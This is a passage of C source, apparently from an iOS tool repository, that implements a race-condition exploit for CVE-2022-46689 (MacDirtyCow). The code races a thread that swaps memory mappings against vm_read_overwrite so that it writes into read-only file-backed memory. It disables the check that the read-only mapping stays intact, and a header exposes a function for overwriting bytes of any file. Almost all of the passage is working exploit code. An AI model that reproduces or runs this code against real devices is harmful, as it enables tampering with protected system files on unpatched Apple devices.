"make_mem_entry() RO"); /* take read-only handle on that target memory */ mo_size = ctx->obj_size; kr = mach_make_memory_entry_64(mach_task_self(), &mo_size, ro_addr, MAP_MEM_VM_SHARE | VM_PROT_READ, &ctx->mem_entry_ro, MACH_PORT_NULL); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "make_mem_entry() RO"); T_QUIET; T_ASSERT_EQ(mo_size, (memory_object_size_t)ctx->obj_size, "wrong mem_entry size"); /* make sure we can't map target memory as writable */ tmp_addr = 0; kr = vm_map(mach_task_self(), &tmp_addr, ctx->obj_size, 0, /* mask */ VM_FLAGS_ANYWHERE, ctx->mem_entry_ro, 0, FALSE, /* copy */ VM_PROT_READ, VM_PROT_READ | VM_PROT_WRITE, VM_INHERIT_DEFAULT); T_QUIET; T_EXPECT_MACH_ERROR(kr, KERN_INVALID_RIGHT, " vm_map() mem_entry_rw"); tmp_addr = 0; kr = vm_map(mach_task_self(), &tmp_addr, ctx->obj_size, 0, /* mask */ VM_FLAGS_ANYWHERE, ctx->mem_entry_ro, 0, FALSE, /* copy */ VM_PROT_READ | VM_PROT_WRITE, VM_PROT_READ | VM_PROT_WRITE, VM_INHERIT_DEFAULT); T_QUIET; T_EXPECT_MACH_ERROR(kr, KERN_INVALID_RIGHT, " vm_map() mem_entry_rw"); /* allocate a source buffer for the unaligned copy */ kr = vm_allocate(mach_task_self(), &e5, ctx->obj_size * 2, VM_FLAGS_ANYWHERE); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate e5"); /* initialize to 'C' */ memset((char *)e5, 'C', ctx->obj_size * 2); char* e5_overwrite_ptr = (char*)(e5 + ctx->obj_size - 1); memcpy(e5_overwrite_ptr, overwrite_data, overwrite_length); int overwrite_first_diff_offset = -1; char overwrite_first_diff_value = 0; for (int off = 0; off < overwrite_length; off++) { if (((char*)ro_addr)[off] != e5_overwrite_ptr[off]) { overwrite_first_diff_offset = off; overwrite_first_diff_value = ((char*)ro_addr)[off]; } } if (overwrite_first_diff_offset == -1) { fprintf(stderr, "no diff?\n"); return false; } /* * get a handle on some writable memory that will be temporarily * switched with the read-only mapping of our target memory to try * and trick copy_unaligned to write to our read-only target. */ tmp_addr = 0; kr = vm_allocate(mach_task_self(), &tmp_addr, ctx->obj_size, VM_FLAGS_ANYWHERE); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate() some rw memory"); /* initialize to 'D' */ memset((char *)tmp_addr, 'D', ctx->obj_size); /* get a memory entry handle for that RW memory */ mo_size = ctx->obj_size; kr = mach_make_memory_entry_64(mach_task_self(), &mo_size, tmp_addr, MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE, &ctx->mem_entry_rw, MACH_PORT_NULL); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "make_mem_entry() RW"); T_QUIET; T_ASSERT_EQ(mo_size, (memory_object_size_t)ctx->obj_size, "wrong mem_entry size"); kr = vm_deallocate(mach_task_self(), tmp_addr, ctx->obj_size); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate() tmp_addr 0x%llx", (uint64_t)tmp_addr); tmp_addr = 0; pthread_mutex_lock(&ctx->mtx); /* start racing thread */ ret = pthread_create(&th, NULL, switcheroo_thread, (void *)ctx); T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "pthread_create"); /* wait for racing thread to be ready to run */ dispatch_semaphore_wait(ctx->running_sem, DISPATCH_TIME_FOREVER); duration = 10; /* 10 seconds */ for (start = time(NULL), loops = 0; time(NULL) < start + duration; loops++) { /* reserve space for our 2 contiguous allocations */ e2 = 0; kr = vm_allocate(mach_task_self(), &e2, 2 * ctx->obj_size, VM_FLAGS_ANYWHERE); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate to reserve e2+e0"); /* make 1st allocation in our reserved space */ kr = vm_allocate(mach_task_self(), &e2, ctx->obj_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_MAKE_TAG(240)); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_allocate e2"); /* initialize to 'B' */ memset((char *)e2, 'B', ctx->obj_size); /* map our read-only target memory right after */ ctx->e0 = e2 + ctx->obj_size; kr = vm_map(mach_task_self(), &ctx->e0, ctx->obj_size, 0, /* mask */ VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_MAKE_TAG(241), ctx->mem_entry_ro, 0, FALSE, /* copy */ VM_PROT_READ, VM_PROT_READ, VM_INHERIT_DEFAULT); T_QUIET; T_EXPECT_MACH_SUCCESS(kr, " vm_map() mem_entry_ro"); /* let the racing thread go */ pthread_mutex_unlock(&ctx->mtx); /* wait a little bit */ usleep(100); /* trigger copy_unaligned while racing with other thread */ kr = vm_read_overwrite(mach_task_self(), e5, ctx->obj_size - 1 + overwrite_length, e2 + 1, &copied_size); T_QUIET; T_ASSERT_TRUE(kr == KERN_SUCCESS || kr == KERN_PROTECTION_FAILURE, "vm_read_overwrite kr %d", kr); switch (kr) { case KERN_SUCCESS: /* the target was RW */ kern_success++; break; case KERN_PROTECTION_FAILURE: /* the target was RO */ kern_protection_failure++; break; default: /* should not happen */ kern_other++; break; } /* check that our read-only memory was not modified */ #if 0 T_QUIET; T_ASSERT_EQ(((char *)ro_addr)[overwrite_first_diff_offset], overwrite_first_diff_value, "RO mapping was modified"); #endif bool is_still_equal = ((char *)ro_addr)[overwrite_first_diff_offset] == overwrite_first_diff_value; /* tell racing thread to stop toggling mappings */ pthread_mutex_lock(&ctx->mtx); /* clean up before next loop */ vm_deallocate(mach_task_self(), ctx->e0, ctx->obj_size); ctx->e0 = 0; vm_deallocate(mach_task_self(), e2, ctx->obj_size); e2 = 0; if (!is_still_equal) { retval = true; fprintf(stderr, "RO mapping was modified\n"); break; } } ctx->done = true; pthread_mutex_unlock(&ctx->mtx); pthread_join(th, NULL); if (unmapAtEnd) { munmap(file_mapped, ctx->obj_size); } kr = mach_port_deallocate(mach_task_self(), ctx->mem_entry_rw); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_deallocate(me_rw)"); kr = mach_port_deallocate(mach_task_self(), ctx->mem_entry_ro); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_port_deallocate(me_ro)"); kr = vm_deallocate(mach_task_self(), ro_addr, ctx->obj_size); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate(ro_addr)"); kr = vm_deallocate(mach_task_self(), e5, ctx->obj_size * 2); T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_deallocate(e5)"); #if 0 T_LOG("vm_read_overwrite: KERN_SUCCESS:%d KERN_PROTECTION_FAILURE:%d other:%d", kern_success, kern_protection_failure, kern_other); T_PASS("Ran %d times in %ld seconds with no failure", loops, duration); #endif return retval; } ================================================ FILE: usprebooter/vm_unaligned_copy_switch_race.h ================================================ #pragma once #include #include /// Uses CVE-2022-46689 to overwrite `overwrite_length` bytes of `file_to_overwrite` with `overwrite_data`, starting from `file_offset`. /// `page_to_overwrite` should be a page aligned `PROT_READ` `MAP_SHARED` region. `` /// `overwrite_length` must be less than or equal to `PAGE_SIZE`. /// Returns `true` if the overwrite succeeded, and `false` if the device is not vulnerable. bool unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd);